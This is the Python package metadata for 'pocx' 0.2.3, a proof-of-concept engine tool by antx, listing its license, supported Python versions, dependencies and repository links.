Metadata-Version: 2.1
Name: pocx
Version: 0.2.3
Summary: A Simple, Fast and Powerful poc engine tools was built by antx, which support synchronous mode and asynchronous mode.
Home-page: https://github.com/antx-code/pocx
License: MIT
Keywords: async,poc,engine,pocx
Author: antx
Author-email: wkaifeng2007@163.com
Requires-Python: >=3.8,<4.0
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Requires-Dist: httpx (>=0.24.1,<0.25.0)
Requires-Dist: loguru (>=0.7.0,<0.8.0)
Requires-Dist: urllib3 (>=1.26.9,<2.0.0)
Project-URL: Repository, https://github.com/antx-code/pocx
